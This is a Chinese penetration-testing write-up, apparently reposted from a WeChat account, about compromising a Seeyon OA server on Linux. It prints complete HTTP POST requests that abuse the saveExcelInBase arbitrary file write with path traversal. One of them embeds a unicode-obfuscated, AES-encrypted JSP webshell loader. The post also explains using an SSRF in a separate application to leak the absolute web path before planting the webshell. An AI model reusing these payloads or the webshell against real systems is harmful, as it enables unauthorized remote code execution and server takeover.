攻防对抗组合漏洞RCE-致远OA

admin 2024年3月18日12:53:48评论25 views字数 4356阅读14分31秒阅读模式
前言

攻防对抗组合漏洞RCE-致远OA

不是星标不推送文章了。

师傅也不想吧~

快把极梦C设置成星标吧。

前言
致远oa linux  有账号
过程
因为有账号,直接尝试后台的漏洞.首先尝试了ofd解压漏点,发现没有成功.利用工具扫描,GG
这个时候,为了防止waf拦截,会进行手动尝试一些最近的漏洞
.然后发现存在一个saveExcel任意文件写入漏洞
尝试利用网上poc,和预想的一样(图是借的)
POST /seeyon/ajax.do;JSESSIONID=chat?method=ajaxAction&managerName=fileToExcelManager&rnd=12700 HTTP/1.1Content-Type: application/x-www-form-urlencodedCache-Control: max-age=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36Host: xxx.xxx.xxx.xxxAccept: text/html, image/gif, image/jpeg, ; q=.2, */; q=.2Content-Length: 94Connection: closemanagerMethod=saveExcelInBase&arguments=["../webapps/ROOT/test2.jsp","",{"columnName":["<%25@page import="java.util.,javax.crypto.,javax.crypto.spec.*"%25><%25!u0063u006cu0061u0073u0073u0020u0055u0020u0065u0078u0074u0065u006eu0064u0073u0020u0043u006cu0061u0073u0073u004cu006fu0061u0064u0065u0072u007bu0055u0028u0043u006cu0061u0073u0073u004cu006fu0061u0064u0065u0072u0020u0063u0029u007bu0073u0075u0070u0065u0072u0028u0063u0029u003bu007du0070u0075u0062u006cu0069u0063u0020u0043u006cu0061u0073u0073u0020u0067u0028u0062u0079u0074u0065u0020u005bu005du0062u0029u007bu0072u0065u0074u0075u0072u006eu0020u0073u0075u0070u0065u0072u002eu0064u0065u0066u0069u006eu0065u0043u006cu0061u0073u0073u0028u0062u002cu0030u002cu0062u002eu006cu0065u006eu0067u0074u0068u0029u003bu007du007d%25><%25u0069u0066u0020u0028u0072u0065u0071u0075u0065u0073u0074u002eu0067u0065u0074u004du0065u0074u0068u006fu0064u0028u0029u002eu0065u0071u0075u0061u006cu0073u0028u0022u0050u004fu0053u0054u0022u0029u0029u007bu0053u0074u0072u0069u006eu0067u0020u006bu003du0022u0065u0034u0035u0065u0033u0032u0039u0066u0065u0062u0035u0064u0039u0032u0035u0062u0022u003bu002fu002au003fu00b1u004bu003fu003fu003fu00b1u00b5u00b1u004bu003fu0033u0032u00a6u00ecu006du0064u0035u00adu00c8u00aau00bau00abu0065u0031u0036u00a6u00ecu00a1u0041u00c0u0071u003fu003fu00b1u00b5u00b1u004bu003fu0072u0065u0062u0065u0079u006fu006eu0064u002au002fu0073u0065u0073u0073u0069u006fu006eu002eu0070u0075u0074u0056u0061u006cu0075u0065u0028u0022u0075u0022u002cu006bu0029u003bu0043u0069u0070u0068u0065u0072u0020u0063u003du0043u0069u0070u0068u0065u0072u002eu0067u0065u0074u0049u006eu0073u0074u0061u006eu0063u0065u0028u0022u0041u0045u0053u0022u0029u003bu0063u002eu0069u006eu0069u0074u0028u0032u002cu006eu0065u0077u0020u0053u0065u0063u0072u0065u0074u004bu0065u0079u0053u0070u0065u0063u0028u006bu002eu0067u0065u0074u0042u0079u0074u0065u0073u0028u0029u002cu0022u0041u0045u0053u0022u0029u0029u003bu006eu0065u0077u0020u0055u0028u0074u0068u0069u0073u002eu0067u0065u0074u0043u006cu0061u0073u0073u0028u0029u002eu0067u0065u0074u0043u006cu0061u0073u0073u004cu006fu0061u0064u0065u0072u0028u0029u0029u002eu0067u0028u0063u002eu0064u006fu0046u0069u006eu0061u006cu0028u006eu0065u0077u0020u0073u0075u006eu002eu006du0069u0073u0063u002eu0042u0041u0053u0045u0036u0034u0044u0065u0063u006fu0064u0065u0072u0028u0029u002eu0064u0065u0063u006fu0064u0065u0042u0075u0066u0066u0065u0072u0028u0072u0065u0071u0075u0065u0073u0074u002eu0067u0065u0074u0052u0065u0061u0064u0065u0072u0028u0029u002eu0072u0065u0061u0064u004cu0069u006eu0065u0028u0029u0029u0029u0029u002eu006eu0065u0077u0049u006eu0073u0074u0061u006eu0063u0065u0028u0029u002eu0065u0071u0075u0061u006cu0073u0028u0070u0061u0067u0065u0043u006fu006eu0074u0065u0078u0074u0029u003bu007d%25>"]}]

攻防对抗组合漏洞RCE-致远OA

奇怪的是路径无法访问,又尝试了123,发现无法访问.
思考一下:
1.路径不对
2.没有上传成功.
ps:经过不停的测试,发现应该是上传成功了,那就思考一下是不是路径不对.
前言
从别的应用,找到了一个ssrf漏洞,这里忘记截图,利用本地演示一下,假设是一个应用系统.发现这个应用系统有一个url的参数,感觉有ssrf就测试了一下.

攻防对抗组合漏洞RCE-致远OA

确实是存在url的ssrf,尝试读取文件内容,目标是linux,可以读取一些默认到文件,这里是演示.

攻防对抗组合漏洞RCE-致远OA

测试过程中,发现报错会输出web到绝对路径.如图.

攻防对抗组合漏洞RCE-致远OA

重点来了:这路径,有点复杂,并不是oa的默认上传路径,应该和中间件部署有关系.
峰回路转
假设通过ssrf获取的路径为 /usr/bin/jmc/test/php
当然linux还有别的方式去获取web路径.
思路这不就来了,通过在网上搜索致远oa的默认安装路径和手册

攻防对抗组合漏洞RCE-致远OA

然后进行拼接url路径.
/usr/bin/jmc/+致远oa路径
经过不同的测试发现,目标的路径为
/usr/bin/jmc/Seeyon/A8/ApacheJetspeed/webapps/ROOT/
尝试上传
POST /seeyon/ajax.do;JSESSIONID=chat?method=ajaxAction&managerName=fileToExcelManager&rnd=12700 HTTP/1.1Content-Type: application/x-www-form-urlencodedCache-Control: max-age=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36Host: xxx.xxx.xxx.xxxAccept: text/html, image/gif, image/jpeg, ; q=.2, */; q=.2Content-Length: 94Connection: closemanagerMethod=saveExcelInBase&arguments=["../../../../../../usr/bin/jmc/Seeyon/A8/ApacheJetspeed/webapps/ROOT/test2.jsp","",{"jmc"]}]
发现成功上传.

攻防对抗组合漏洞RCE-致远OA

后续上传webshell.成功拿下

攻防对抗组合漏洞RCE-致远OA

原文始发于微信公众号(极梦C):攻防对抗组合漏洞RCE-致远OA

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月18日12:53:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   攻防对抗组合漏洞RCE-致远OAhttp://cn-sec.com/archives/2584503.html

发表评论

匿名网友 填写信息